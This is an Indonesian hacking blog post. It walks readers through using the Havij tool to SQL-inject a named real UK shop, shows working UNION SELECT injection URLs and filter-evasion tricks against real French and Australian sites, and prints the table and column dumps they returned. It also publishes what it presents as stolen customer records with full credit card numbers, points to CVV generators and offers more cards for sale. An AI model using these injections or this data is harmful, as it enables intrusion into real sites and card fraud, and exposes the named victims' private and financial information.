Havij adalah sebuah tool yg sederhana buatan r3dm0v3
ada banyak fungsi yang bisa kita gunakan dengan tool ini
ok
sekarang aku akan mencoba kasih tutornyapertama kita cari sebuah site yang terdapat vuln didalamnyadisini aku mencoba site http://www.chce.co.uk/toy-figure-details.php?cat=7
* buka aplikasinya kemudian masukkan vuln site di box target,disitu ada berbagai macam opsi, tentang database, method, serta type injection untuk database, seperti yang kita lihat jenisnya adalah mysql, jadi pilih mysql namun seandainya kita belum tahu, kita pilih aja auto, begitu juga method dan type selanjutnya setelah itu klik aja analyze kemudian akan muncul keterangan seperti pada gambar dari situ kita dapat data seperti berikut
Analyzing http://www.chce.co.uk/toy-figure-details.php?cat=7
Positive pattern generated
Host IP: 217.112.82.31Web Server: Microsoft-IIS/6.0Powered-by: PleskWin
Powered-by: ASP.NET
Keyword Found
Injection type is Integer
DB Server:MySQL unknown ver
Selected Column Count is 5
Valid String Column is 1Target Vulnerable :D
Current DB: choiced_choicedollshouses
Injection Syntax: -999.9 UNION ALL SELECT %String_Col%,2,3,4,5--
* data kita udah kayaknya udah lengkap, eits tapi belum, nih masih awal selanjutnya kiat pergi ke tab info, disitu ada tombol get, nah silakan klik tombol itu kemudian jrengg muncul deh data database yang lebih lengkap seperti yang terlihat pada gambar
* ok selanjutnya kita pergi ke tab tables, nah ini yg paling penting heh, silakan pilih database yang akan di dump isinya nah disitu aq pilih database satu- satunya yaitu choiced_choicedollshouses kemudian klik Get tables nah selanjutnya biarkan tool ini mencari table yang terdapat pada tuh situs
* Ok, selanjutnya data tabel pun kita dapatkan sepenuhnya, skrg kita kasih centang tabel yang akan kita telusuri, kita kira- kira aja yg mana tabel yang berisi data yang kita butuhkan. disini aq centang semua (tidak disarankan), namun untuk koneksi internet lola, sebaiknya yang diperlukan za. selanjutnya klik za get columns nah maka tool akan secara otomatis mengluarkan kolom2 yang terdapat pada tabel
* Selanjutnya aq rasa kalian udah tau langkah selanjutnya, setelah mendapatkan data silakan save data kemudian buka file itu dengan browser anda maka hasilnya tampak seperti di gambar
* Setelah itu mari qta gunakan data yang qta dapat untuk berbagai hal, Wkwkwkkkk. .. .
* di tool ini jg terdapat admin finder serta md5 cracker dari beberapa database website klo kurang lengkap, silakan cari sendiri di web yang menurutmu lengkap
untuk tool yang lain, sebenernya masih banyak lain kali za ya klo g sibug!
^_^
see next time
tx
By missblacklist the LH
untuk download tool ini, silakan klik dibawah ini
download
tempo hari aq coba ngedump web, eh dapat beberapa nomor
aktif apa g YaH???
malaz ah coba2 silakan coba sendiri
Wkwkwkkkk . .. . .. . (udah punya yg laen soalnya)
First Name Tania
Surname Gordon
Email iamoxygen@gmail.com
Phone (03)5154 2652
Mobile 0406055767
Business
Address 31 hamilton st
City/Suburb Orbost
State VIC
Postcode 3888
Country Australia
CREDIT CARD DETAILS
Card Type MASTERCARD
Card Number 51632020329632965190
Card Name Tania M Gordon
Card Expiry 08 / 11
First Name Brigette
Surname Mihaljevic
Email brigette@mihcon.com.au
Phone 0353399994
Mobile 0418584452
Business
Address 1 Martin Ave
City/Suburb Ballarat
State VIC
Postcode 3350
Country Australia
CREDIT CARD DETAILS
Card Type VISA
Card Number 4564699001994184
Card Name mrs b m mihaljevic
Card Expiry 06 / 13
First Name Lee
Surname Martin
Email lee.martin@5starnetworks.com.au
Phone 07 3123 6907
Mobile 0421 697 570
Business 5 Star Networks
Address Unit 3, 11 Forge Close
City/Suburb Sumner, Brisbane
State QLD
Postcode 4074
Country Australia
CREDIT CARD DETAILS
Card Type VISA
Card Number 4564680001549772
Card Name Lee A Martin
Card Expiry 03 / 12
untuk cvv, silakan cari sendiri, ada banyak tool koq yg bsa generate tuh nomor
for any other number, contact me via YM
Wkwkk kkk .. ... .. . .
ada banyak website yang mempunyai lubang pada injection tapi ada juga berlubang tapi udah terlindungi
seperti ketika kita masukkan code
www.target.com/celah.php?id=1' ketika kita masukkan code ' maka muncul error
atau ketika kita tes dengan code lainnya muncul error namun
www.target.com/celah.php?id=1+And+1=2+union+select+ ketika kita memasukkan kode +And+1=2+union+select+ maka yang terjadi malah website muncul error yang lain (bukan error sql)hal itu disebabkan karena website sudah di filter dengen perintah- perintah sql dan sejenisnya.
filter ini bekerja terhadap kata seperti union,select, all dsb.
dalam hal ini kita bisa menyiasati hal ini yaitu dengan merubah perintah huruf-huruf pada perintah sql mnjadi www.target.com/celah.php?id=+aNd+1=2+uNiOn+SeLect+
ini juga berlaku pada perintah2 yang lain seperti xss,lfi, dsb.
nb:tidak semua situs bisa disiasati dengan ini
selamat mencoba
hari ini aku coba 2 main sql eh gak taunya dapat banyak kayak gini
silakan diliat isinya http://www.magicgsm.fr/shop/achat/index.php?catid=1+AND+1=2+UNION+ALL+SELECT+0,1+--&start=20
User: magicgsm@localhost
Database: magicgsm
Version: 5.0.44
Total Table Found: 99
Table: Adresse
Id,Client,Societe,Nom,Prenom,Adresse,CP,Ville,Pays,
Table: Affilies
id,nom,nom_ste,adr_ste_1,adr_ste_2,siret,rcs,tva_ste,next_fact,taux,url,commission,login,password,flash,site,email,actif,id_phpmv,
Table: Annonce
Rubrique,Produit,Valeur,
Table: Client
Id,Code,transactionId,Email,EmailCS,
Table: Commande
Commande: 19
Id,Date,DateCS,Adresse,AdresseConfirmee,AdresseFact,Reglement,Port,Etat,Facture,FactureEnvoyee,Expedition,Transfert,DateReglement,DateEnvoi,DateEnvoi2,Fusion,CS_recu,orderId,
Table: Commande_Archive
Commande_Archive: 19
Id,Date,DateCS,Adresse,AdresseConfirmee,AdresseFact,Reglement,Port,Etat,Facture,FactureEnvoyee,Expedition,Transfert,DateReglement,DateEnvoi,DateEnvoi2,Fusion,CS_recu,orderId,
Table: Compatible
Modele,Produit,
Table: Compteur_global
session_id,ip_adress,localisation,entry_time,
Table: Compteur_global_part
session_id,ip_adress,localisation,entry_time,RevDNS,
Table: Compteur_online
session_id,ip_adress,localisation,expiry,
Table: Compteur_online_part
session_id,ip_adress,localisation,expiry,RevDNS,
Table: Email
Uid,Cde,Datetime,Sujet,transid,
Table: Email_1
Uid,date,compteur,
Table: Etat
Etat: 3
Id,Etat,Commentaire,
Table: Expedition
Expedition: 2
Id,Libelle,
Table: Facture
Facture: 5
Id,Numero,FactureEnvoyee,Commande,NumFact,
Table: Lien
Lien: 4
Id,Lien,Groupe,Valeur,
Table: Marque
Marque: 2
Id,Nom,
Table: Modèle
Modèle: 5
Id,Nom,Bluetooth,IRDA,Marque,
Table: NonConf
NonConf: 5
Id,Article,Pseudo,DateVente,AdMail,
Table: Partenaire
Partenaire: 4
id,nom,url,logo,
Table: Pays
Pays: 3
Iso,Nom,chrono,
Table: Pdt_Cde
Pdt_Cde: 8
Id,Produit,Commande,PU,Qt,Libelle,transId,buyerId,
Table: Pro
Pro: 2
Code,Email,
Table: Reglement
Reglement: 3
Id,Reglement,Accepte,
Table: Rubrique
Rubrique: 3
Id,Libelle,Colonne,
Table: RubriquePro
RubriquePro: 3
Id,Libelle,Colonne,
Table: Suivi
Suivi: 12
Id,Type,Colis,Commande,CP,DateEnvoi,DateEcheance,DateLivraison,Retard,fini,poids,ebay,
Table: Type
Type: 2
Categorie,Rubrique,
Table: TypePro
TypePro: 2
Categorie,Rubrique,
Table: UGSM_Categories
UGSM_Categories: 4
Id,Libelle,Flash,texte_gsmmania,
Table: UGSM_Marques
UGSM_Marques: 2
Id,Libelle,
Table: UGSM_Produits
UGSM_Produits: 15
Id,Reference,Marque,achat_pr,Categorie,Photo,Nom,Description,PrixHT,CodeTVA,Stock,prixpro,envente,Dispo,Poids,
Table: UGSM_Tva
UGSM_Tva: 3
Id,CodeTva,TauxTva,
Table: Vue
Vue: 23
Datetime,EtatCde,Date,IdAdresse,AdresseConfirmee,Port,Expedition,ChoixExp,CP,Ville,Pays,Code,Nom,Email,Total,Nb_Art,IdCde,EtatCdeDetail,IdReglement,Reglement,Origine,Uid,Facture,
Table: _dummy
_dummy: 1
num,
Table: bannieres
bannieres: 6
id,url_lien,url_image,actif,coeff,shop,
Table: categ_prise_m
categ_prise_m: 4
id,categ_mg,categ_pm,niveau_pm,
Table: confirmation_ca
confirmation_ca: 7
transaction,date,id_commande,montant,id_utilisateur,statut,code_banque,
Table: peel_articles
peel_articles: 11
id,surtitre,titre,texte,image1,on_special,date_insere,date_maj,lang,chapo,etat,
Table: peel_articles_rubriques
peel_articles_rubriques: 2
article_id,rubrique_id,
Table: peel_avoirs
peel_avoirs: 5
id_avoir,id_utilisateur,montant,libelle,deduit,
Table: peel_categories
peel_categories: 9
id,parent_id,nom,description,image,image_over,lang,etat,on_special,
Table: peel_codes
peel_codes: 3
code,remise,libelle,
Table: peel_codes_cat
peel_codes_cat: 2
code,id_cat,
Table: peel_commandes
peel_commandes: 35
id,id_utilisateur,email,o_timestamp,a_timestamp,id_trans,statut,statut_details,client_info1,societe_liv,nom_liv,adr_liv,cp_liv,ville_liv,pays_liv,tva_payee,taux_tva,client_info2,commentaires,montant,id_paiement,paiement,DateReglement,FactureEnvoyee,transport,cout_transport,poids,Expedition,Transfert,DateEnvoi,Pro,id_fact,partenaire,etat_part,facture_part,
Table: peel_commandes_archives
id,id_utilisateur,email,o_timestamp,a_timestamp,id_trans,statut,statut_details,client_info1,societe_liv,nom_liv,adr_liv,cp_liv,ville_liv,pays_liv,tva_payee,taux_tva,client_info2,commentaires,montant,id_paiement,paiement,DateReglement,FactureEnvoyee,transport,cout_transport,poids,Expedition,Transfert,DateEnvoi,Pro,id_fact,partenaire,etat_part,facture_part,
Table: peel_commandes_articles
peel_commandes_articles: 8
commande_id,produit_id,nom_produit,prix,quantite,promotion,tva,id_ligne,
Table: peel_demandes
peel_demandes: 7
id,nom_produit,nom_demandeur,email_demandeur,message,date,traite,
Table: peel_log
peel_log: 7
id,id_utilisateur,adresse_ip,localisation,date,Nom,Societe,
Table: peel_panier_hors_cnx
peel_panier_hors_cnx: 3
id_utilisateur,id_produit,quantite,
Table: peel_prix_cat
peel_prix_cat: 8
Categorie,ParCat,qte1,prix1,qte2,prix2,qte3,prix3,
Table: peel_produits
peel_produits: 32
id,reference,nom,descriptionpro,image2,image3,image1,prix,on_special,date_insere,date_maj,lang,image4,descriptif,promotion,tva,etat,stock,dispo,poids,qte1,prix1,qte2,prix2,qte3,prix3,prix_choix,etatpart,prixpart,achat_pr,newsletter,
Table: peel_produits_categories
peel_produits_categories: 2
produit_id,categorie_id,
Table: peel_produits_marques
peel_produits_marques: 2
produit_id,marque_id,
Table: peel_produits_references
peel_produits_references: 2
produit_id,reference_id,
Table: peel_promos
peel_promos: 5
id_commande,code,montant,libelle,id_utilisateur,
Table: peel_rubriques
peel_rubriques: 8
id,parent_id,nom,description,image,lang,on_special,etat,
Table: peel_rupture
peel_rupture: 5
id_produit,email,nom,date,site,
Table: peel_societe
peel_societe: 21
id,societe,adresse,code_postal,ville,tel,fax,email,siren,tvaintra,nom,prenom,pays,siteweb,logo,code_banque,code_guichet,numero_compte,cle_rib,titulaire,domiciliation,
Table: peel_tva
peel_tva: 2
id,tva,
Table: peel_utilisateurs
peel_utilisateurs: 24
id_utilisateur,email,mot_passe,priv,civilite,prenom,nom_famille,societe,rcs,naissance,telephone,fax,portable,adresse,code_postal,ville,pays,cnil,newsletter,commercial,Valide,solde,motif,tva_intracomm,
Table: phpmv_a_category
phpmv_a_category: 2
id,name,
Table: phpmv_a_config
phpmv_a_config: 2
id,name,
Table: phpmv_a_file
phpmv_a_file: 2
id,name,
Table: phpmv_a_keyword
phpmv_a_keyword: 2
id,name,
Table: phpmv_a_newsletter
phpmv_a_newsletter: 2
id,name,
Table: phpmv_a_page
phpmv_a_page: 2
id,name,
Table: phpmv_a_partner_name
phpmv_a_partner_name: 2
id,name,
Table: phpmv_a_partner_url
phpmv_a_partner_url: 2
id,name,
Table: phpmv_a_provider
phpmv_a_provider: 2
id,name,
Table: phpmv_a_resolution
phpmv_a_resolution: 2
id,name,
Table: phpmv_a_search_engine
phpmv_a_search_engine: 2
id,name,
Table: phpmv_a_site
phpmv_a_site: 2
id,name,
Table: phpmv_a_vars_name
phpmv_a_vars_name: 2
id,name,
Table: phpmv_a_vars_value
phpmv_a_vars_value: 2
id,name,
Table: phpmv_archives
phpmv_archives: 62
idarchives,idsite,done,period,simple,date1,date2,nb_uniq_vis,nb_vis,nb_vis_returning,nb_uniq_vis_returning,nb_pag,nb_pag_returning,nb_uniq_pag,nb_max_pag,nb_vis_1pag,nb_vis_1pag_returning,sum_vis_lth,sum_vis_lth_returning,nb_direct,nb_search_engine,nb_site,nb_newsletter,nb_partner,vis_period,vis_nb_vis,vis_st,vis_lt,pag_st,pag_lt,vis_lth,vis_nb_pag,vis_pag_grp,vis_country,vis_continent,vis_provider,vis_config,vis_os,vis_browser,vis_browser_type,vis_resolution,vis_plugin,vis_search_engine,vis_keyword,vis_site,vis_partner,vis_newsletter,int_lt,int_st,int_referer_type,int_search_engine,int_keyword,int_site,int_partner,int_newsletter,int_country,int_continent,int_config,int_os,int_browser,int_resolution,compressed,
Table: phpmv_category
phpmv_category: 5
idcategory,complete_name,name,level,idparent,
Table: phpmv_groups
phpmv_groups: 4
idgroups,name,view,admin,
Table: phpmv_ip_ignore
phpmv_ip_ignore: 4
idip_ignore,idsite,ip_min,ip_max,
Table: phpmv_link_vp
phpmv_link_vp: 5
idlink_vp,idvisit,idpage,idpage_ref,total_time_page_ref,
Table: phpmv_link_vpv
phpmv_link_vpv: 2
idlink_vp,idvars,
Table: phpmv_newsletter
phpmv_newsletter: 3
idnewsletter,idsite,name,
Table: phpmv_page
phpmv_page: 3
idpage,idcategory,name,
Table: phpmv_page_md5url
phpmv_page_md5url: 4
idpage_md5url,idpage,md5url,idpage_url,
Table: phpmv_page_url
phpmv_page_url: 2
idpage_url,url,
Table: phpmv_query_log
phpmv_query_log: 6
idquery_log,idsite,query,time,date,daytime,
Table: phpmv_site
phpmv_site: 5
idsite,name,logo,params_choice,params_names,
Table: phpmv_site_partner
phpmv_site_partner: 3
idsite_partner,idsite,name,
Table: phpmv_site_partner_url
phpmv_site_partner_url: 3
idsite_partner_url,idsite_partner,url,
Table: phpmv_site_url
phpmv_site_url: 3
idsite_url,idsite,url,
Table: phpmv_users
phpmv_users: 7
login,password,alias,email,send_mail,rss_hash,date_registered,
Table: phpmv_users_link_groups
phpmv_users_link_groups: 3
idsite,idgroups,login,
Table: phpmv_vars
phpmv_vars: 4
idvars,name,int_value,varchar_value,
Table: phpmv_version
phpmv_version: 1
version,
Table: phpmv_visit
phpmv_visit: 32
idvisit,idsite,idcookie,returning,last_visit_time,server_date,server_time,referer,os,browser_name,browser_version,resolution,color_depth,pdf,flash,java,director,quicktime,realplayer,windowsmedia,local_time,ip,hostname_ext,browser_lang,total_pages,total_time,country,continent,exit_idpage,entry_idpage,entry_idpageurl,md5config,
Table: rs_log
rs_log: 6
id,date,ip,robot,hits,agent,
Table: rs_log_url
rs_log_url: 5
id_url,url,date,robot,hits,
Table: rs_robots
rs_robots: 10
id,actif,user_agent,ip1,ip2,nom,detection,descr_fr,url,maj,
[-] URL: www.footgear.com.au/pages/category_detail.php?Category_ID=1+AND+1=2+UNION+ALL+SELECT+0,1,2,3,4,5,6,7,darkc0de+--&Category=Golf
[-] User: johnny_footge@localhost
[-] Database: johnny_store2007
[-] Version: 4.1.22-standard
[-] Found Table : tbladmins
[-] Found Table : sort
[-] Found Table : _wfspro_admin
[-] Found Table : 4images_users
[-] Found Table : a_admin
[-] Found Table : account
[-] Found Table : accounts
[-] Found Table : adm
[-] Found Table : admin
[-] Found Table : admin_login
[-] Found Table : admin_user
[-] Found Table : admin_userinfo
[-] Found Table : administer
[-] Found Table : administrable
[-] Found Table : administrate
[-] Found Table : administration
[-] Found Table : administrator
[-] Found Table : administrators
[-] Found Table : adminrights
[-] Found Table : admins
[-] Found Table : adminuser
[-] Found column number: 1
isinya belum tak liat satu pun jadi aku gak tau ada isinya pa g??
rapidshare adalah layanan hosting terkenal pasti semua udah tau!!
tapi ada cara lain agar kita bisa download cepat kayak premium alias rapid lech
untuk situsnya silakan klik link di bawah ini!!
eits lupa g cuma rs tapi yang lain juga !! ada banyak
Lanjutkan..
Other Link
Post komen Disini
My Yahoo
pilih lagu
Blog Archive
donation
link change
